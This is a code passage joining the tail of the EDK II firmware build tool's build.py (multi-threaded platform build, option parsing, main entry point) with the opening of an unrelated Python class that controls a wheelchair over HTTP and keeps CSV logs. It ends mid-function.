    GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
    inverted = defaultdict(set)
    for command, (inf, arch) in GenFfsDict.items():
        inverted[inf, arch].add(command)
    return inverted
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
    """Build the active platform using the BuildTask thread scheduler.

    Mirrors _BuildPlatform but queues one ModuleMakeUnit per module and
    lets BuildTask fan the make steps out over self.ThreadNumber threads.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd(Wa.ArchList)
            # multi-thread exit flag
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                if Pa is None:
                    continue
                ModuleList = []
                for Inf in Pa.Platform.Modules:
                    ModuleList.append(Inf)
                # Add the INF only list in FDF
                if GlobalData.gFdfParser is not None:
                    for InfName in GlobalData.gFdfParser.Profile.InfList:
                        Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
                        if Inf in Pa.Platform.Modules:
                            continue
                        ModuleList.append(Inf)
                for Module in ModuleList:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                    if Ma is None:
                        continue
                    if Ma.CanSkipbyHash():
                        self.HashSkipModules.append(Ma)
                        if GlobalData.gBinCacheSource:
                            EdkLogger.quiet("cache hit: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
                        continue
                    else:
                        if GlobalData.gBinCacheSource:
                            EdkLogger.quiet("cache miss: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
                    # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                    if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                        # for target which must generate AutoGen code and makefile
                        if not self.SkipAutoGen or self.Target == 'genc':
                            Ma.CreateCodeFile(True)
                        if self.Target == "genc":
                            continue
                        if not self.SkipAutoGen or self.Target == 'genmake':
                            if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                del CmdListDict[Module.File, Arch]
                            else:
                                Ma.CreateMakeFile(True)
                        if self.Target == "genmake":
                            continue
                    self.BuildModules.append(Ma)
                    # Initialize all modules in tracking to 'FAIL'
                    if Ma.Arch not in GlobalData.gModuleBuildTracking:
                        GlobalData.gModuleBuildTracking[Ma.Arch] = dict()
                    if Ma not in GlobalData.gModuleBuildTracking[Ma.Arch]:
                        GlobalData.gModuleBuildTracking[Ma.Arch][Ma] = 'FAIL'
                self.Progress.Stop("done!")
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    # Generate build task for the module
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        self.invalidateHash()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    self.invalidateHash()
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))
            MakeContiue = time.time()
            #
            #
            # All modules have been put in build tasks queue. Tell task scheduler
            # to exit if all tasks are completed
            #
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.UpdateBuildCache()
            self.BuildModules = []
            self.MakeTime += int(round((time.time() - MakeContiue)))
            #
            # Check for build error, and raise exception if one
            # has been signaled.
            #
            if BuildTask.HasError():
                self.invalidateHash()
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        # NOTE(review): "platorm" typo below is in the shipped runtime message; left as-is in this doc-only pass.
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
                #
                # Get Module List: non-library modules keyed by upper-case GUID.
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma
                #
                # Rebase module to the preferred memory address before GenFds
                #
                MapBuffer = []
                if self.LoadFixAddress != 0:
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                if self.Fdf:
                    #
                    # Generate FD image if there's a FDF file found
                    #
                    GenFdsStart = time.time()
                    if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
                        EdkLogger.error("build", COMMAND_FAILURE)
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                    self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
    self.invalidateHash()
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
    """Write GuidedSectionTools.txt into each existing FV directory.

    For every (target, toolchain, arch), collect the *_GUID entries from
    tools_def that match the build prefix and emit one "guid tool path"
    line per GUIDed tool.

    Fix: the output file is now opened with a ``with`` statement so the
    handle is closed even if writing raises (previously it leaked on error).
    """
    for BuildTarget in self.BuildTargetList:
        for ToolChain in self.ToolChainList:
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag
                    )
            FvDir = Wa.FvDir
            # Nothing to write when no FV output directory was produced.
            if not os.path.exists(FvDir):
                continue
            for Arch in self.ArchList:
                # Build up the list of supported architectures for this build
                prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
                # Look through the tool definitions for GUIDed tools
                guidAttribs = []
                for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.items():
                    if attrib.upper().endswith('_GUID'):
                        split = attrib.split('_')
                        thisPrefix = '_'.join(split[0:3]) + '_'
                        if thisPrefix == prefix:
                            guid = value.lower()
                            toolName = split[3]
                            path = '_'.join(split[0:4]) + '_PATH'
                            path = self.ToolDef.ToolsDefTxtDictionary[path]
                            path = self.GetFullPathOfTool(path)
                            guidAttribs.append((guid, toolName, path))
                # Write out GuidedSecTools.txt; 'with' guarantees the handle closes.
                toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
                with open(toolsFile, 'wt') as toolsFd:
                    for guidedSectionTool in guidAttribs:
                        print(' '.join(guidedSectionTool), file=toolsFd)
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
    """Resolve *tool* to a real filesystem path.

    Direct paths are resolved immediately; otherwise each PATH entry is
    searched in order.  If nothing matches, the input is returned unchanged.
    """
    if os.path.exists(tool):
        return os.path.realpath(tool)
    # Not a direct path -- search every directory on PATH in order.
    for directory in os.environ['PATH'].split(os.pathsep):
        candidate = os.path.join(directory, tool)
        if os.path.exists(candidate):
            return os.path.realpath(candidate)
    # The tool was not found anywhere; fall back to the input name.
    return tool
## Launch the module or platform build
#
def Launch(self):
    """Dispatch to module or platform build based on the parsed options."""
    if self.ModuleFile:
        # A single-module build is always single-threaded.
        self.SpawnMode = False
        self._BuildModule()
    elif self.SpawnMode and self.Target in ["", "all"]:
        # Multi-threaded platform build; also emit GuidedSectionTools.txt.
        self._MultiThreadBuildPlatform()
        self.CreateGuidedSectionToolsFile()
    else:
        # Partial targets (genc, fds, clean, ...) run single-threaded.
        self.SpawnMode = False
        self._BuildPlatform()
    if self.Target == 'cleanall':
        RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
    """Emit the as-built INF for every module built in this session."""
    for built_module in self.BuildModules:
        built_module.CreateAsBuiltInf()
def UpdateBuildCache(self):
    """Copy built and hash-skipped modules, plus their libraries, into the binary cache.

    Every module from both lists is copied; each distinct library instance
    is copied exactly once.  HashSkipModules is reset afterwards.
    """
    seen_modules = set()
    for module in self.BuildModules + self.HashSkipModules:
        module.CopyModuleToCache()
        seen_modules.add(module)
    # Deduplicate library instances shared between modules before copying.
    seen_libraries = set()
    for module in seen_modules:
        seen_libraries.update(module.LibraryAutoGenList)
    for library in seen_libraries:
        library.CopyModuleToCache()
    self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
    """Abort in-flight work after a build error.

    Temporarily raises the log level to ERROR so the shutdown does not spam
    progress output, aborts the progress indicator, stops the build-task
    scheduler when running multi-threaded, then restores the log level.
    """
    OldLogLevel = EdkLogger.GetLevel()
    EdkLogger.SetLevel(EdkLogger.ERROR)
    Utils.Progressor.Abort()
    # Idiomatic truthiness test (was: `self.SpawnMode == True`).
    if self.SpawnMode:
        BuildTask.Abort()
    EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=None):
    """Parse -D command-line macro definitions into a {name: value} dict.

    Each entry is either "NAME" (value defaults to "TRUE") or "NAME=VALUE";
    only the first '=' splits name from value.  An invalid macro name aborts
    via EdkLogger.error.

    Fix: the default was a shared mutable list (``DefineList=[]``); it is
    now None, which is observably identical (empty dict returned) and
    avoids the mutable-default pitfall.
    """
    DefineDict = {}
    if DefineList is not None:
        for Define in DefineList:
            DefineTokenList = Define.split("=", 1)
            if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
                EdkLogger.error('build', FORMAT_INVALID,
                                "The macro name must be in the pattern [A-Z][A-Z0-9_]*",
                                ExtraData=DefineTokenList[0])
            if len(DefineTokenList) == 1:
                DefineDict[DefineTokenList[0]] = "TRUE"
            else:
                DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
    return DefineDict
# Options already seen on the command line; used to reject duplicates.
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
    """optparse callback enforcing that an option appears at most once."""
    if option in gParamCheck:
        parser.error("Option %s only allows one instance in command line!" % option)
    else:
        setattr(parser.values, option.dest, value)
        gParamCheck.append(option)
def LogBuildTime(Time):
    """Format a duration in seconds as "HH:MM:SS" (plus ", N day(s)" past 24h).

    Returns None when Time is zero/None/empty, matching the caller contract.
    """
    if not Time:
        return None
    broken_down = time.gmtime(Time)
    clock_part = time.strftime("%H:%M:%S", broken_down)
    # tm_yday starts at 1, so anything past day one means >= 24 hours.
    if broken_down.tm_yday > 1:
        return clock_part + ", %d day(s)" % (broken_down.tm_yday - 1)
    return clock_part
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
    """Build the optparse parser for the build tool and parse sys.argv.

    Returns:
        (Opt, Args): the optparse.Values object and the positional
        build-target arguments.
    """
    Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
    # Target selection: arch / platform / module / build target / toolchain.
    Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
        help="ARCHS is one of list: IA32, X64, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
    Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
        help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
    Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
        help="Build the module specified by the INF file name argument.")
    Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
                      action="append")
    Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
        help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
    Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
        help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
    Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
        help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
             "processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
    # Flash image inputs: FDF file and the FD/FV/Capsule images to generate.
    Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
        help="The name of the FDF file to use, which overrides the setting in the DSC file.")
    Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
        help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
    Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
        help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
    Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
        help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
    # Behavior toggles.
    Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
    Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
    Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
    Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
    # Logging / verbosity.
    Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
    Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
        help="Make use of silent mode of (n)make.")
    Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
    Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
                                                                              "including library instances selected, final dependency expression, "\
                                                                              "and warning messages, etc.")
    Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
    Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
    # Build report configuration.
    Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
    Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
        help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
             "To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
    Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
        help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
             "This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
             "will override the setting in [BuildOptions] section of platform DSC.")
    # Caching and miscellaneous.
    Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
    Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
    Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
    Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
    Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
    Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
    Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
    Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
    Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
    Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
    Parser.add_option("--disable-include-path-check", action="store_true", dest="DisableIncludePathCheck", default=False, help="Disable the include path check for outside of package.")
    (Opt, Args) = Parser.parse_args()
    return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
    """Tool entry point: parse options, validate inputs, run the build.

    Returns 0 on success or a non-zero EDK error code; all failure modes are
    funneled through the exception ladder below so a summary line and build
    duration are always printed.
    """
    StartTime = time.time()
    # Initialize log system
    EdkLogger.Initialize()
    GlobalData.gCommand = sys.argv[1:]
    #
    # Parse the options and args
    #
    (Option, Target) = MyOptionParser()
    GlobalData.gOptions = Option
    GlobalData.gCaseInsensitive = Option.CaseInsensitive
    # Set log level (verbose > quiet > debug > default INFO)
    if Option.verbose is not None:
        EdkLogger.SetLevel(EdkLogger.VERBOSE)
    elif Option.quiet is not None:
        EdkLogger.SetLevel(EdkLogger.QUIET)
    elif Option.debug is not None:
        EdkLogger.SetLevel(Option.debug + 1)
    else:
        EdkLogger.SetLevel(EdkLogger.INFO)
    if Option.LogFile is not None:
        EdkLogger.SetLogFile(Option.LogFile)
    if Option.WarningAsError == True:
        EdkLogger.SetWarningAsError()
    if platform.platform().find("Windows") >= 0:
        GlobalData.gIsWindows = True
    else:
        GlobalData.gIsWindows = False
    EdkLogger.quiet("Build environment: %s" % platform.platform())
    EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
    ReturnCode = 0
    MyBuild = None
    # BuildError stays True unless the try-block runs to completion.
    BuildError = True
    try:
        # Exactly zero or one positional target is accepted; default is "all".
        if len(Target) == 0:
            Target = "all"
        elif len(Target) >= 2:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
                            ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
        else:
            Target = Target[0].lower()
            if Target not in gSupportedTarget:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
                                ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
        #
        # Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
        #
        CheckEnvVariable()
        GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
        Workspace = os.getenv("WORKSPACE")
        #
        # Get files real name in workspace dir
        #
        GlobalData.gAllFiles = Utils.DirCache(Workspace)
        WorkingDirectory = os.getcwd()
        # With no -m option, a single INF in the CWD implies a module build.
        if not Option.ModuleFile:
            FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
            FileNum = len(FileList)
            if FileNum >= 2:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
                                ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
            elif FileNum == 1:
                Option.ModuleFile = NormFile(FileList[0], Workspace)
        # Normalize module/platform/FDF paths to workspace-relative PathClass.
        if Option.ModuleFile:
            if os.path.isabs (Option.ModuleFile):
                if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
                    Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
            Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
            ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        if Option.PlatformFile is not None:
            if os.path.isabs (Option.PlatformFile):
                if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
                    Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
            Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
        if Option.FdfFile is not None:
            if os.path.isabs (Option.FdfFile):
                if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
                    Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
            Option.FdfFile = PathClass(Option.FdfFile, Workspace)
            ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
            EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
        MyBuild = Build(Target, Workspace, Option)
        GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
        if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
            MyBuild.Launch()
        #
        # All job done, no error found and no exception raised
        #
        BuildError = False
    except FatalError as X:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = X.args[0]
    except Warning as X:
        # error from Fdf parser
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        else:
            EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
        ReturnCode = FORMAT_INVALID
    except KeyboardInterrupt:
        ReturnCode = ABORT_ERROR
        if Option is not None and Option.debug is not None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
    except:
        if MyBuild is not None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        # try to get the meta-file from the object causing exception
        Tb = sys.exc_info()[-1]
        MetaFile = GlobalData.gProcessingFile
        while Tb is not None:
            if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
                MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
            Tb = Tb.tb_next
        EdkLogger.error(
                    "\nbuild",
                    CODE_ERROR,
                    "Unknown fatal error when processing [%s]" % MetaFile,
                    ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
                    RaiseError=False
                    )
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = CODE_ERROR
    finally:
        Utils.Progressor.Abort()
        Utils.ClearDuplicatedInf()
    if ReturnCode == 0:
        try:
            MyBuild.LaunchPostbuild()
            Conclusion = "Done"
        except:
            Conclusion = "Failed"
    elif ReturnCode == ABORT_ERROR:
        Conclusion = "Aborted"
    else:
        Conclusion = "Failed"
    FinishTime = time.time()
    BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
    BuildDurationStr = ""
    if BuildDuration.tm_yday > 1:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
    else:
        BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
    if MyBuild is not None:
        if not BuildError:
            MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
    EdkLogger.SetLevel(EdkLogger.QUIET)
    EdkLogger.quiet("\n- %s -" % Conclusion)
    EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
    EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
    return ReturnCode
if __name__ == '__main__':
    exit_code = Main()
    # Keep the exit status in the portable 0-127 range; map anything else to
    # the conventional generic failure code 1.
    if not (0 <= exit_code <= 127):
        exit_code = 1
    sys.exit(exit_code)
|
control.py | #NAME: move.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for moving the wheelchair in an intuative manner
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import numpy as np
import threading
import time
import math
import requests
import pygame
from requests import Session
#define threading wrapper
def threaded(fn):
    """Decorator that runs *fn* on a fresh thread; the wrapper returns the Thread."""
    def wrapper(*args, **kwargs):
        thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return wrapper
class Control:
    """HTTP control interface for a wheelchair drive API.

    Transmits (speed, angle, command) triplets to the configured host via
    requests, decodes the telemetry response, mirrors traffic into transmit /
    receive CSV logs, and offers helpers (ramping, turning, gamepad teleop,
    collision avoidance) built on top of transmitCommand().
    """
    #Received Variables (telemetry parsed from the wheelchair's reply)
    batteryVoltage = 0
    rightMotorCurrent = 0
    leftMotorCurrent = 0
    status = "NULL"
    #Intrinsic Parameters (last set-points sent to the API)
    setSpeed = 0
    setAngle = 0
    setCommand = "SEND"
    bootTime = 8  # seconds the controller needs to boot after a RESET
    debug = False
    def __init__(self, configuration):
        """Read *configuration*, open logs, start the gamepad thread and reset.

        :param configuration: nested dict with 'control' (url, maxSpeed) and
            'general' (logFile, transmitLog, receiveLog) sections.
        """
        self.connected = False
        self.dataAge = time.time() + 60
        # BUGFIX: self.logging must exist before the first self.log() call.
        # Previously it was only assigned inside the try block, so a bad
        # configuration made the except handler crash with AttributeError.
        self.logging = False
        #Load Configuration Variables
        try:
            self.host = configuration['control']['url']
            self.maxSpeed = configuration['control']['maxSpeed']
            #Get the details of the log file from the configuration
            self.logFilePath = configuration['general']['logFile']
            self.logging = True
            #Open log file
            try:
                self.log("INFO = Control class has accessed log file.")
            except:
                self.logging = False
                self.log("ERROR: Unable to access log file when initialising control interface.")
        except:
            self.log("ERROR = The configuration file cannot be decoded.")
        self.gamepadRunning = False
        self.gamepad()
        #Open Transmission and Receive Log Files
        try:
            #Initialise Transmit Log
            self.transmitLogFilePath = configuration['general']['transmitLog']
            transmitLog = open(self.transmitLogFilePath, "w")
            transmitLog.write("Date and Time,Speed,Angle,Command Message\n")
            transmitLog.close()
            #Initialise Receive Log
            self.receiveLogFilePath = configuration['general']['receiveLog']
            receiveLog = open(self.receiveLogFilePath, "w")
            receiveLog.write("Date & Time,Battery Voltage(V),Right Current (A),Left Current (A),Status Message\n")
            receiveLog.close()
            #Log Entry
            self.log("INFO = Opened Log files for transmission and receive data.")
        except:
            self.log("ERROR = Could not open transmit and receive logs.")
        #Send Message and Retrieve Response
        self.reset()
        self.log("INFO = Control interface initialised succesfully.")
    #Logging Function
    def log(self, entry):
        """Timestamp *entry*, append it to the main log (if enabled) and echo it."""
        currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
        logEntry = currentDateTime + ": " + entry
        if self.logging == True:
            #open a txt file to use for logging
            logFile = open(self.logFilePath, "a+")
            logFile.write(logEntry + "\n")
            logFile.close()
        print(logEntry)
    #Receive Log Function
    def receiveLog(self, entry):
        """Append a timestamped CSV telemetry row to the receive log."""
        currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
        logEntry = currentDateTime + "," + entry
        if self.logging == True:
            #open a txt file to use for logging
            logFile = open(self.receiveLogFilePath, "a+")
            logFile.write(logEntry + "\n")
